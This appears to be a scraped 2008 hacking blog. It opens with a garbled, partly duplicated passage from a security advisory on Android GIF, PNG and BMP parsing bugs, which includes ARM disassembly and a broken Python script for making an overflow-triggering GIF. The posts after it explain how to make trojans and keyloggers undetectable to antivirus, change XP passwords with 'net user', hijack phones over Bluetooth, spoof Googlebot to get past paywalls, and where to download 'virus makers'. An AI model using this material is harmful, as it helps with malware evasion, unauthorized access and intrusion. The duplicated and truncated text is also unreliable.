DGifGetWord(GifFile, &GifFile->SHeight) == GIF_ERROR)
return GIF_ERROR;
...
}
- -----------/
We can see that the fields are stored in the first 2 words of the
structure:
/-----------
typedef struct GifFileType {
/* Screen dimensions. */
GifWord SWidth, SHeight,
...
}
- -----------/
In the disassembly of the GIFImageDecoder::onDecode() function provided
below we can see how the DGifOpen() function is called and that the
return value (A GifFileType struct) is stored on the $R5 ARM register:
/-----------
.text:0002F234 BL _DGifOpen
.text:0002F238 SUBS R5, R0, #0 ; GifFile -_ $R5
- -----------/
Then, the giflib function 'DGifSlurp()' is called and the Image size is
correctly allocated using the Image Width and Height and not the Logical
Screen Size:
/-----------
Int DGifSlurp(GifFileType * GifFile)
{ ... ImageSize = sp->ImageDesc.Width * sp->ImageDesc.Height;
sp->RasterBits = (unsigned char *)malloc(ImageSize *
sizeof(GifPixelType));
...
}
- -----------/
Afterwards the _Logical Screen_ Width and Height are stored in the R9
and R11 registers:
/-----------
.text:0002F28C LDMIA R5, {R9,R11} ; R9=SWidth R11=SHeight !
- -----------/
However the actual image may be much larger that these sizes that are
incorrectly passed to a number of methods of the 'GIFImageDecoder':
/-----------
ImageDecoder::chooseFromOneChoice():
.text:0002F294 MOV R0, R8
.text:0002F298 MOV R1, #3
.text:0002F29C MOV R2, R9
.text:0002F2A0 MOV R3, R11
.text:0002F2A4 STR R12, [SP,#0x48+var_3C]
.text:0002F2A8 BL _ImageDecoder19chooseFromOneChoice;
ImageDecoder::chooseFromOneChoice(SkBitmap::Config,int
,int)
Bitmap::setConfig():
.text:0002F2B8 MOV R0, R7 ; R7 = SkBitmap
.text:0002F2BC MOV R1, #3
correctly allocated using the Image Width and Height and not the Logical
Screen Size:
/-----------
Int DGifSlurp(GifFileType * GifFile)
{ ... ImageSize = sp->ImageDesc.Width * sp->ImageDesc.Height;
sp->RasterBits = (unsigned char *)malloc(ImageSize *
sizeof(GifPixelType));
...
}
- -----------/
Afterwards the _Logical Screen_ Width and Height are stored in the R9
and R11 registers:
/-----------
.text:0002F28C LDMIA R5, {R9,R11} ; R9=SWidth R11=SHeight !
- -----------/
However the actual image may be much larger that these sizes that are
incorrectly passed to a number of methods of the 'GIFImageDecoder':
/-----------
ImageDecoder::chooseFromOneChoice():
.text:0002F294 MOV R0, R8
.text:0002F298 MOV R1, #3
.text:0002F29C MOV R2, R9
.text:0002F2A0 MOV R3, R11
.text:0002F2A4 STR R12, [SP,#0x48+var_3C]
.text:0002F2A8 BL _ImageDecoder19chooseFromOneChoice;
ImageDecoder::chooseFromOneChoice(SkBitm
,int)
Bitmap::setConfig():
.text:0002F2B8 MOV R0, R7 ; R7 = SkBitmap
.text:0002F2BC MOV R1, #3
.text:0002F2C0 MOV R2, R9 ; R9=SWidth R11=SHeight !
.text:0002F2C4 MOV R3, R11
.text:0002F2C8 STR R10, [SP,#0x48+var_48]
.text:0002F2CC BL _Bitmap9setConfig ;
Bitmap::setConfig(SkBitmap::Config,uint,uint,uint)
- -----------/
This function stores the SWidth and SHeight inside the Bitmap object as
shown in the following code snippet:
/-----------
.text:00035C38 MOV R7, R2 ; $R2 = SWidth, goes to $R7
.text:00035C3C MOV R8, R3 ; $R3 = SHeight, goes to $R8
.text:00035C40 MOV R4, R0 ; $R4 = *Bitmap
- -----------/
And later:
/-----------
.text:00035C58 BL _Bitmap15ComputeRowBytes ;
SkBitmap::ComputeRowBytes(SkBitmap::Config,uint)
.text:00035C5C MOV R5, R0 ; $R5 = Real Row Bytes
.text:00035C68 STRH R7, [R4,#0x18] ; *Bitmap+0x18 = SWidth
.text:00035C6C STRH R8, [R4,#0x1A] ; *Bitmap+0x1A = SHeight
.text:00035C60 STRH R5, [R4,#0x1C] ; *Bitmap+0x1C = Row Bytes
- -----------/
The following python script generates a GIF file that causes the
overflow. It requires the Python Imaging Library. Once generated the GIF
file, it must be opened in the Android browser to trigger the overflow:
/-----------
##Android Heap Overflow
##Ortega Alfredo _ Core Security Exploit Writers Team
##tested against Android SDK m3-rc37a
import Image
import struct
#Creates a _good_ gif image
imagename='overflow.gif'
str = '\x00\x00\x00\x00'*30000
im = Image.frombuffer('L',(len(str),1),str,'raw','L',0,1)
im.save(imagename,'GIF')
#Shrink the Logical screen dimension
SWidth=1
SHeight=1
img = open(imagename,'rb').read()
img = img[:6]+struct.pack(')+img[10:]
#Save the _bad_ gif image
q=open(imagename,'wb=""')
q.write(img)
q.close()
- -----------/
This security bug affects Android SDK m3-rc37a and earlier versions.
Version m5-rc14 of the Android SDK includes a fix and is not vulnerable
to this bug.
#2 - PNG image parsing, multiple vulnerabilities:
The Portable Network Graphics (PNG) is a bitmapped image format that
employs lossless data compression [9]. PNG was created to improve upon
and replace the GIF format as an image file format that does not require
a patent license.
The library 'libsgl.so' used by Android's WebKit contains commonly used
code to load graphic files, as libpng, giflib and others. The version
inside libsgl.so distributed with Android SDK m3-rc37a and earlier
versions include the string '"libpng version 1.2.8 - December 3, 2004"'.
Source code inspection of the file
'\WebKitLib\WebKit\WebCore\platform\image-decoders\png\png.c' included
in the 'webkit-522-android-m3-rc20.tar.gz ' release of the Android
project reveals that '"libpng version 1.2.7 - September
12, 2004"' has been used in this release.
This old version of libpng makes Android SDK m3-rc37a and earlier
versions vulnerable to the following known issues: ' CVE-2006-5793,
CVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268,
CVE-2007-5269 '.
Android version m5-rc14 has been updated to include libpng 1.2.24 and is
likely not vulnerable.
#3 - BMP image processing, negative offset integer overflow:
The BMP file format, sometimes called bitmap or DIB file format (for
device-independent bitmap), is an image file format used to store bitmap
digital images, especially on Microsoft Windows and OS/2 operating
systems [10].
The integer overflow is caused when a Windows Bitmap file (.BMP) header
is parsed in the method 'BMP::readFromStream(Stream *,
ImageDecoder::Mode)' inside the 'libsgl.so' library. When the
value of the 'offset' field of the BMP file header is negative and the
Bitmap Information section (DIB header) specifies an image of 8 bits per
pixel (8 bpp) the parser will try to allocate a palette, and will use
the negative offset to calculate the size of the palette.
The following code initializes the palette with the color white
('0x00ffffff') but with a carefully chosen negative offset it can be
made to overwrite any address of the process with that value. Because
the BMP decoder source wasn't released, a disassembly of the binary
included by Android is provided below:
/-----------
.text:0002EE38 MOV LR, R7 ; R7 is the negative offset
.text:0002EE3C MOV R12, R7,LSL#2
.text:0002EE40
.text:0002EE40 loc_2EE40
.text:0002EE40 LDR R3, [R10,#0x10]
.text:0002EE44 ADD LR, LR, #1
.text:0002EE48 MOVL R2, 0xFFFFFFFF
.text:0002EE4C ADD R1, R12, R3 ; R3 is uninitialized (because of the
same bug) but ranges 0x10000-0x20000
.text:0002EE50 MOV R0, #0
.text:0002EE54 CMP LR, R9
.text:0002EE58 STRB R2, [R12,R3] ;Write 0x00ffffff to R12+13 (equals R1)
.text:0002EE5C STRB R2, [R1,#2]
.text:0002EE60 STRB R0, [R1,#3]
.text:0002EE64 STRB R2, [R1,#1]
.text:0002EE68 ADD R12, R12, #4
.text:0002EE6C BNE loc_2EE40
- -----------/
Now, if let's take a look at the memory map of the Android browser:
/-----------
# ps
ps
USER PID PPID VSIZE RSS WCHAN PC NAME
root 1 0 248 64 c0084edc 0000ae2c S /init
root 2 0 0 0 c0049168 00000000 S kthreadd
...
root 1206 1165 16892 14564 c0084edc 00274af8 S ./gdb
app_0 1574 535 83564 12832 ffffffff afe0c79c S
com.google.android.browser
root 1600 587 840 324 00000000 afe0bfbc R ps
# cat /proc/1574/maps
cat /proc/1574/maps
00008000-0000a000 rwxp 00000000 1f:00 514 /system/bin/app_process
0000a000-00c73000 rwxp 0000a000 00:00 0 [heap]
08000000-08001000 rw-s 00000000 00:08 344 /dev/zero (deleted)
...
#
- -----------/
We can see that the heap is located in the range '0000a000-00c73000'
and it is executable. Overwriting this area will allow to redirect
execution flow if there is a virtual table stored in the heap. Later on
the same method we can see that a call to the "Stream" Object VT is made:
/-----------
.text:0002EB64 LDR R12, [R8] # R8 is the "this" pointer of the Stream Object
.text:0002EB68 MOV R0, R8
.text:0002EB6C MOV LR, PC
.text:0002EB70 LDR PC, [R12,#0x10] # A call is made to Stream+0x10
- -----------/
.text:0002F2C4 MOV R3, R11
.text:0002F2C8 STR R10, [SP,#0x48+var_48]
.text:0002F2CC BL _Bitmap9setConfig ;
Bitmap::setConfig(SkBitmap::Config,uint,
- -----------/
This function stores the SWidth and SHeight inside the Bitmap object as
shown in the following code snippet:
/-----------
.text:00035C38 MOV R7, R2 ; $R2 = SWidth, goes to $R7
.text:00035C3C MOV R8, R3 ; $R3 = SHeight, goes to $R8
.text:00035C40 MOV R4, R0 ; $R4 = *Bitmap
- -----------/
And later:
/-----------
.text:00035C58 BL _Bitmap15ComputeRowBytes ;
SkBitmap::ComputeRowBytes(SkBitmap::Conf
.text:00035C5C MOV R5, R0 ; $R5 = Real Row Bytes
.text:00035C68 STRH R7, [R4,#0x18] ; *Bitmap+0x18 = SWidth
.text:00035C6C STRH R8, [R4,#0x1A] ; *Bitmap+0x1A = SHeight
.text:00035C60 STRH R5, [R4,#0x1C] ; *Bitmap+0x1C = Row Bytes
- -----------/
The following python script generates a GIF file that causes the
overflow. It requires the Python Imaging Library. Once generated the GIF
file, it must be opened in the Android browser to trigger the overflow:
/-----------
##Android Heap Overflow
##Ortega Alfredo _ Core Security Exploit Writers Team
##tested against Android SDK m3-rc37a
import Image
import struct
#Creates a _good_ gif image
imagename='overflow.gif'
str = '\x00\x00\x00\x00'*30000
im = Image.frombuffer('L',(len(str),1),str,'r
im.save(imagename,'GIF')
#Shrink the Logical screen dimension
SWidth=1
SHeight=1
img = open(imagename,'rb').read()
img = img[:6]+struct.pack('
#Save the _bad_ gif image
q=open(imagename,'wb=""')
q.write(img)
q.close()
- -----------/
This security bug affects Android SDK m3-rc37a and earlier versions.
Version m5-rc14 of the Android SDK includes a fix and is not vulnerable
to this bug.
#2 - PNG image parsing, multiple vulnerabilities:
The Portable Network Graphics (PNG) is a bitmapped image format that
employs lossless data compression [9]. PNG was created to improve upon
and replace the GIF format as an image file format that does not require
a patent license.
The library 'libsgl.so' used by Android's WebKit contains commonly used
code to load graphic files, as libpng, giflib and others. The version
inside libsgl.so distributed with Android SDK m3-rc37a and earlier
versions include the string '"libpng version 1.2.8 - December 3, 2004"'.
Source code inspection of the file
'\WebKitLib\WebKit\WebCore\platform\imag
in the 'webkit-522-android-m3-rc20.tar.gz ' release of the Android
project reveals that '"libpng version 1.2.7 - September
12, 2004"' has been used in this release.
This old version of libpng makes Android SDK m3-rc37a and earlier
versions vulnerable to the following known issues: ' CVE-2006-5793,
CVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268,
CVE-2007-5269 '.
Android version m5-rc14 has been updated to include libpng 1.2.24 and is
likely not vulnerable.
#3 - BMP image processing, negative offset integer overflow:
The BMP file format, sometimes called bitmap or DIB file format (for
device-independent bitmap), is an image file format used to store bitmap
digital images, especially on Microsoft Windows and OS/2 operating
systems [10].
The integer overflow is caused when a Windows Bitmap file (.BMP) header
is parsed in the method 'BMP::readFromStream(Stream *,
ImageDecoder::Mode)' inside the 'libsgl.so' library. When the
value of the 'offset' field of the BMP file header is negative and the
Bitmap Information section (DIB header) specifies an image of 8 bits per
pixel (8 bpp) the parser will try to allocate a palette, and will use
the negative offset to calculate the size of the palette.
The following code initializes the palette with the color white
('0x00ffffff') but with a carefully chosen negative offset it can be
made to overwrite any address of the process with that value. Because
the BMP decoder source wasn't released, a disassembly of the binary
included by Android is provided below:
/-----------
.text:0002EE38 MOV LR, R7 ; R7 is the negative offset
.text:0002EE3C MOV R12, R7,LSL#2
.text:0002EE40
.text:0002EE40 loc_2EE40
.text:0002EE40 LDR R3, [R10,#0x10]
.text:0002EE44 ADD LR, LR, #1
.text:0002EE48 MOVL R2, 0xFFFFFFFF
.text:0002EE4C ADD R1, R12, R3 ; R3 is uninitialized (because of the
same bug) but ranges 0x10000-0x20000
.text:0002EE50 MOV R0, #0
.text:0002EE54 CMP LR, R9
.text:0002EE58 STRB R2, [R12,R3] ;Write 0x00ffffff to R12+13 (equals R1)
.text:0002EE5C STRB R2, [R1,#2]
.text:0002EE60 STRB R0, [R1,#3]
.text:0002EE64 STRB R2, [R1,#1]
.text:0002EE68 ADD R12, R12, #4
.text:0002EE6C BNE loc_2EE40
- -----------/
Now, if let's take a look at the memory map of the Android browser:
/-----------
# ps
ps
USER PID PPID VSIZE RSS WCHAN PC NAME
root 1 0 248 64 c0084edc 0000ae2c S /init
root 2 0 0 0 c0049168 00000000 S kthreadd
...
root 1206 1165 16892 14564 c0084edc 00274af8 S ./gdb
app_0 1574 535 83564 12832 ffffffff afe0c79c S
com.google.android.browser
root 1600 587 840 324 00000000 afe0bfbc R ps
# cat /proc/1574/maps
cat /proc/1574/maps
00008000-0000a000 rwxp 00000000 1f:00 514 /system/bin/app_process
0000a000-00c73000 rwxp 0000a000 00:00 0 [heap]
08000000-08001000 rw-s 00000000 00:08 344 /dev/zero (deleted)
...
#
- -----------/
We can see that the heap is located in the range '0000a000-00c73000'
and it is executable. Overwriting this area will allow to redirect
execution flow if there is a virtual table stored in the heap. Later on
the same method we can see that a call to the "Stream" Object VT is made:
/-----------
.text:0002EB64 LDR R12, [R8] # R8 is the "this" pointer of the Stream Object
.text:0002EB68 MOV R0, R8
.text:0002EB6C MOV LR, PC
.text:0002EB70 LDR PC, [R12,#0x10] # A call is made to Stream+0x10
- -----------/
Saturday, March 8, 2008
This tutorial tells you how to make a Trojan, Virus, Keylogger, or anything that would be found harmful, NOT. This tutorial explains how to make all files look %100 clean (become clean and be %100 UNDETECTABLE from ALL ANTIVIRUSES!!!!! ALL!!!!!)Ready? GO!
First, get your trojan, virus or keylogger, or server or w/e you plan on using to become undetectable, and get it ready. Fix it up, create it, whatever.
My personal favorite
keylogger: Ardamax Keylogger
Remote Administration Tool (Must not have a router): Poisin Ivy
Google is your friend.
Now that you have your trojan, virus or keylogger or w/e harmful ready, its time to make it UNDETECED!
1. Download Software Passport (Armadillo) by Silicon Realms. This is THE best binder out there I know of, it makes everything %100 UNDETECTABLE BY ALL ANTIVIRUSES (including Norton, Kaspersky, Avast, etc)… The direct link to dl the program is here:
Code:
http://nct.digitalriver.com/fulfill/0161.001
There is a form to fill out information, so put in your real email address, and then you’ll recieve a download link in your email (it might be in Spam, Junk mail section so beware.)
2. Once you download the program, install it.3. Once installed, you open it up and see this:
Code:
http://img339.imageshack.us/img339/6…assportzh3.jpg
This is the program. Now that you have it open, you might be confused on what the hell to do, right? Well, this is what you do!
1. Download this pre-made settings. These settings are pre-made by me so you won’t be confused. Everything is working.
DOWNLOAD THIS FOR THE PRE-MADE SETTINGS:
Code:
http://rapidshare.com/files/8749860/projects.arm.html
DOWNLOAD THIS FOR THE BACKUP (You need this in the same location as the projects.arm file) YOU NEED THIS FILE ALSO!
Code:
http://rapidshare.com/files/8750048/projects.Stats.html
Now, when you download these files, and you put them in the SAME FOLDER (or same location), open Software Passport again and click Load Existing Project (top left).
Where it says “Files to Protect” (if theres stuff there, delete it):
Add the files you want to make %100 UNDETECTABLE!!
Now, once done, go to the bottom right and click “Build Project”. A bunch of windows will come up, just click Yes and OK.
Now, once its created, they are %100 undetectable. Go to
Code:
virustotal.com
to scan it with every Antivirus, and they wont find ANYTHING!
„It takes a long time to learn simplicity.“
Change XP Passwords
NOTE: This only works for XP home edition.
If you want to change a password on your computer all you have to do is follow these directions very carefully.
1.) Go to start.
2.) Press “run”
3.) Press “cmd”
4.) After cmd.exe comes up, type “net user” and press enter.
5.) It will show all users on your computer. Pick the user from the list and type “net user (name of person)
(and the new password you want.)”
6.)Enter. It will say “The command completed successfully.”
7.) Test it.
Good Luck!
Beat Rapidshare Download Limits and Waitin Times...!!
Here are some hints to help you more efficently use rapidshare. Skipping waiting time and bypassing download limits are rapidshare hacks that everybody should know.
From www.Jamzezwebsite.webs.com
Here are some methods for doing this:
1. Short-Out the JavaScript:
- 1. Goto the page you want to download
2. Select FREE button
3. In the address bar put the following: javascript:alert(c=0)
4. Click OK
5. Click OK to the pop-up box
6. Enter the captcha
7. Download Your File
2. Request a new IP address from your ISP server.
- Here’s how to do it in windows:
1. Click Start
2. Click run
3. In the run box type cmd.exe and click OK
4. When the command prompt opens type the following. ENTER after each new line.
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit
ipconfig /release
ipconfig /renew
exit
5. Erase your cookies in whatever browser you are using.
6. Try the rapidshare download again.
Frequently you will be assigned a new IP address when this happens. Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. To be honest, I do not know how to do this in linux/unix/etc. If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.
3. Use a proxy with SwitchProxy and Firefox:
- 1. Download and install Firefox if you have not already
2. Download and install SwitchProxy
3. Google for free proxies
4. When you hit your download limit, clean your cookies and change your proxy
4. Use an anonymous service:
- Running your system through the tor network should in theory work; however, it is difficult to use and setup. Plus, you allow others to run their evil deeds through your system as well by using this system. Anonymizer 2005 is inexpensive, easy to use, but not free. Other pay services would likely work as well.
5. You can use a bookmarklet to stop your wait times:
- 1. Open IE
2. Right Click On This Link
3. Select Add to Favorites
4. Select Yes to the warning that the bookmark may be unsafe.
5. Name it “RapidShare No Wait”
6. Click on the Links folder (if you want to display it in your IE toolbar)
7. Click OK
8. You may need to close and reopen IE to see it
9. Goto rapidshare and click the bookmarklet when you are forced to wait
Super Bluetooth Hack - Now U All Can Do It..!!
With this java software you can connect to another mobile and ….
Once connected to a another phone via bluetooth you can:
- read his messages
- read his contacts
- change profile
- play his ringtone even if phone is on silent
- play his songs(in his phone)
- restart the phone
- switch off the phone
- restore factory settings
- change ringing volume
- And here comes the best
Call from his phone” it includes all call functions like hold etc.
Notes:
1.) When connecting devices use a code 0000
2.) At start of programm on smartphones do not forget to turn on bluetooth before start of the mobile .
Download: 111kb
http://rapidshare.com/files/69356389/SBH.v1.07.rar
Mirror1:
http://w13.easy-share.com/14502671.html
Mirror2:
http://www.megaupload.com/?d=R0SEV5PU
Mirror 3:
http://www.mediafire.com/?3wnbowtbmku
Pass: www.dl4all.com
Enable Right Click On Webs Dat Disabled It..!!
Lots of web sites have disabled the right click function of the mouse button… it’s really, really annoying.
This is done so that you don’t steal (via right-click->save picture) their photos or images or any other goodies.
Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.
It’s easy to change, assuming your using IE 6:
Click “Tools”->”Internet Options” Click the “Security” tab Click “Custom Level” Scroll down to the “Scripting” section Set “Active Scripting” to “disable” Click “Ok” a couple of times. You’ll probably want to turn this back to “enable” when your done… ’cause generally the javascript enhances a website
This is done so that you don’t steal (via right-click->save picture) their photos or images or any other goodies.
Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.
It’s easy to change, assuming your using IE 6:
Click “Tools”->”Internet Options” Click the “Security” tab Click “Custom Level” Scroll down to the “Scripting” section Set “Active Scripting” to “disable” Click “Ok” a couple of times. You’ll probably want to turn this back to “enable” when your done… ’cause generally the javascript enhances a website
Secret Backdoor To Many Websites
Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first….
The lesson you should have learned here is: Obviously Google can go where you can’t.Can we solve this problem? Yes, we can.
We merely have to convince the site we want to enter, that WE ARE GOOGLE. In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.How then, can you disguise yourself as a Googlebot? Quite simple:
by changing your browser’s User Agent.
Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.
*********************************************
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Internet Settings\5.0\User Agent]
@=”Googlebot/2.1″
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Internet Settings\5.0\User Agent]
@=”Googlebot/2.1″
“Compatible”=”+http://www.googlebot.com/bot.html
***************************************************
Please Remove The Spaces Between CurrenVersion\ Internet Settings
“Voila! You’re done!You may always change it back again….
I know only one site that uses you User Agent to establish your eligability to use its services, and that’s the Windows Update site…
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:
******************************************
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@=”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
Friday, March 7, 2008
Hardcore Virus Makers
Download: http://www.megaupload.com/?d=6YPTOAXR
Mirror: http://rapidshare.com/files/29541835/TeraBIT_VM_2.8.zip.html
- Code: Select all
http://jeyjey.persiangig.com/Download/JPSVM3.zip
- Code: Select all
http://www.megaupload.com/?d=Y356K5W7
How To Get Virus Off
You may have thought it was funny at first but that virus that you opened that was supposed to be a joke doesnt go away very easily. If you restart your computer it will start again. Heres what you do.
1. Go into processes and end the process csmm.exe
2. Go to the toolbar and click start.
3. My computer
4. C:
5. Windows
6. System 32
Now once your in system 32 there will be A LOT of files. Go to the one that says csmm and delete it. Then you can restart your computer and the virus wont start again
Subscribe to:
Posts (Atom)